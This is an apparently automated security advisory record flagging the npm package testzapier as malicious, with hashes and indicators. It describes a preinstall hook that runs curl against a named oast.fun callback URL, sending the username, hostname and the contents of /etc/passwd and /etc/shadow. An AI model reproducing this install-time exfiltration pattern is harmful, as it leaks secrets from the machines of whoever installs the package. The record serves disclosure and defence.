{"id":"MAL-2026-5575","summary":"Malicious code in testzapier (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (a5840f2a3b34d7f32de7243a146ecf85ac875bd1ef09b0ba9a395d08e356084f)\npackage.json declares a preinstall hook (`node index.js`) that fires automatically on `npm install`. index.js spawns a shell that runs `curl -X POST` against `http://kpfdtycruuyszysbsjtoj9al6djfqrtve.oast.fun/noderedactedsdk/$(whoami)/$(hostname)/`, embedding the installer's username and hostname in the URL path. The User-Agent header carries a base64-encoded blob containing the contents of /etc/passwd, /etc/hosts, /etc/shadow (when readable as root), and the output of `id`. The destination is an interactsh/oast.fun OOB-callback subdomain, plain HTTP, with no relationship to any documented package purpose. Installer harm is direct and unconditional: any machine running `npm install testzapier` leaks host identity and local-account/secret-file contents to the attacker.\n","modified":"2026-06-11T05:46:34.816239928Z","published":"2026-06-11T04:37:03Z","database_specific":{"malicious-packages-origins":[{"sha256":"045f2a9515d6ea6e0d97f528486c1ed7ffb6626ae018c414b5842ba2db15fac1","import_time":"2026-06-11T05:40:57.221108557Z","modified_time":"2026-06-11T04:37:10Z","versions":["1.0.1"],"source":"amazon-inspector","id":"IN-MAL-2026-005461"},{"sha256":"a5840f2a3b34d7f32de7243a146ecf85ac875bd1ef09b0ba9a395d08e356084f","import_time":"2026-06-11T05:40:57.127194827Z","modified_time":"2026-06-11T04:37:03Z","versions":["1.0.0"],"source":"amazon-inspector","id":"IN-MAL-2026-005460"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/testzapier/v/1.0.1"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/testzapier/v/1.0.0"}],"affected":[{"package":{"name":"testzapier","ecosystem":"npm","purl":"pkg:npm/testzapier"},"versions":["1.0.1","1.0.0"],"database_specific":{"cwes":[{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"}],"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/testzapier/MAL-2026-5575.json","indicators":{"package_integrity":[{"hashes":{"sha512_sri":"sha512-wiKHGj8gNG+rJpnPbwH1OUDqA4JXnuW91SO1N2tyk4U6VGtpWSQbkXGAeM9HirAwvwUylQCpW8ZW74GRjAKl/g==","sha1":"18b84099166da0d71bf41fe7992b13d2a01e1b08"},"filename":"testzapier-1.0.1.tgz"}],"evidence_files":[{"sha256":"fbaabfcebd13909c0b2cfb768cce31fa97ad5d44c303eb328ee3d84351e68852","path":"index.js","tlsh":"cef0dc5a48f5e83677f218bcef049c1f7747ea800436b35354ef6618235c9a884aa0b7"},{"sha256":"db06e32ac36e947460a4855b1a1ea12fcd4d710051eaf8bbc809eb4334c631d0","path":"package.json","tlsh":"5fd05e245e23953365c4266a1d2aa4867261cebf08143c0da3db142e93cf67798ff32c"}]}}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}